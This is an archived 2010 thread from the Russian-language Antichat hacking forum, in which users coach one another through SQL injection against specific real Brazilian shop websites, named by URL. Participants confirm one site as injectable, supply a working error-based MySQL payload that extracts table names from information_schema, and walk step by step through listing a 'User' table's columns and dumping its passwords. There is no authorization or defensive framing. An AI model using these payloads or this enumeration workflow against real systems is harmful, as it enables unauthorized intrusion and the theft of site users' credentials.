ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
05.12.2010, 13:43
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131
Репутация:
74
|
|
А вот вопрос, когда есть стандартная инъекция, то нельзя ли в подзапросе выполнить UPDATE?
|
|
|
06.12.2010, 02:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
4532
Репутация:
-1
|
|
Можно ли что то сделать в таких случаях
http://www.omelhordamoda.com.br/modafeminina.asp?CatID=80%27
http://www.siliconaction.com.br/registro/secao.mv?nomearquivo=[]
http://rasta.com.br/loja/index.php?page=shop.product_details%27&flypagep[]=shop.flypage%27&product_id=4685%27&category_id=8% 27&manufacturer_id=0%27&option=com_virtuemart&Item id=1%27
|
|
|
|
06.12.2010, 02:42
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
[Ozzi]
В первом случае - скуля http://www.omelhordamoda.com.br/modafeminina.asp?CatID=1'
БД - MSAccess
Вот статья про эту субд /threadnav50550-1.html
А в остальных 2ух просто раскрытие я так понял.
Сообщение от fl00der
fl00der said:
А вот вопрос, когда есть стандартная инъекция, то нельзя ли в подзапросе выполнить UPDATE?
Нет,нельзя.Апдейт встречается довольно редко,также как и обход авторизации.
|
|
|
|
06.12.2010, 16:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
4532
Репутация:
-1
|
|
Сообщение от ~d0s~
~d0s~ said:
[Ozzi]
В первом случае - скуля http://www.omelhordamoda.com.br/modafeminina.asp?CatID=1'
БД - MSAccess
Вот статья про эту субд /threadnav50550-1.html
Почитал попробовал но чет не раскручивается (
|
|
|
|
06.12.2010, 22:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
4532
Репутация:
-1
|
|
Как переделать этот запрос
' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(VERSION(), 1, 63), FLOOR(RAND(0)*2))) --
так что б он вывел table_name из information_schema
|
|
|
|
06.12.2010, 22:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
Сообщение от [Ozzi
"]
[Ozzi] said:
Как переделать этот запрос
' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(VERSION(), 1, 63), FLOOR(RAND(0)*2))) --
так что б он вывел table_name из information_schema
|
|
|
|
06.12.2010, 22:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
4532
Репутация:
-1
|
|
Сообщение от Фараон
Фараон said:
' or 1 group by concat((select table_name from information_schema.tables limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1
Ступил.. Спасибо!!!
|
|
|
|
07.12.2010, 01:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
4532
Репутация:
-1
|
|
Делаю такой запрос
Код:
Code:
select column_name from information_schema.columns where table_name='User'
мне выдает там 5 значенй логин пароль и тд , делаю дальше так
Код:
Code:
select логин from User -
меня бросает на главную страницу почему? |
|
|
|
07.12.2010, 01:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
Сообщение от [Ozzi
"]
[Ozzi] said:
Делаю такой запрос
Код:
Code:
select column_name from information_schema.columns where table_name='User'
мне выдает там 5 значенй логин пароль и тд , делаю дальше так
Код:
Code:
select логин from User -
меня бросает на главную страницу почему? Проверьте количество записей:
Код:
Code:
select count(*) from User
Потом проверь, в какой базе таблица:
Код:
Code:
select table_schema from information_schema.tables where table_name='User'
Потом запросом:
Код:
Code:
select password from table_schema.User -
Выводи данные
Линк скинь.
|
|
|
|
07.12.2010, 01:30
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от [Ozzi
"]
[Ozzi] said:
Делаю такой запрос
Код:
Code:
select column_name from information_schema.columns where table_name='User'
мне выдает там 5 значенй логин пароль и тд , делаю дальше так
Код:
Code:
select логин from User -
меня бросает на главную страницу почему? причин может быть несколько, мб таблица в другой базе, тогда вопрос будет фелс, и будет редирект
возможно что там фильтр на определенные слова..
а еще много чего возможно,.. анализируй сайт
смотри на какие слова ругается
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Ozzi]](/avatars/avatar.jpg?2459920){kind=avatar}
![Аватар для [Ozzi]](/avatars/avatar.jpg?2460366){kind=avatar}
![Аватар для [Ozzi]](/avatars/avatar.jpg?2460877){kind=avatar}
![Аватар для [Ozzi]](/avatars/avatar.jpg?2460937){kind=avatar}
![Аватар для [Ozzi]](/avatars/avatar.jpg?2461133){kind=avatar}
Похожие темы
Комбинированный вид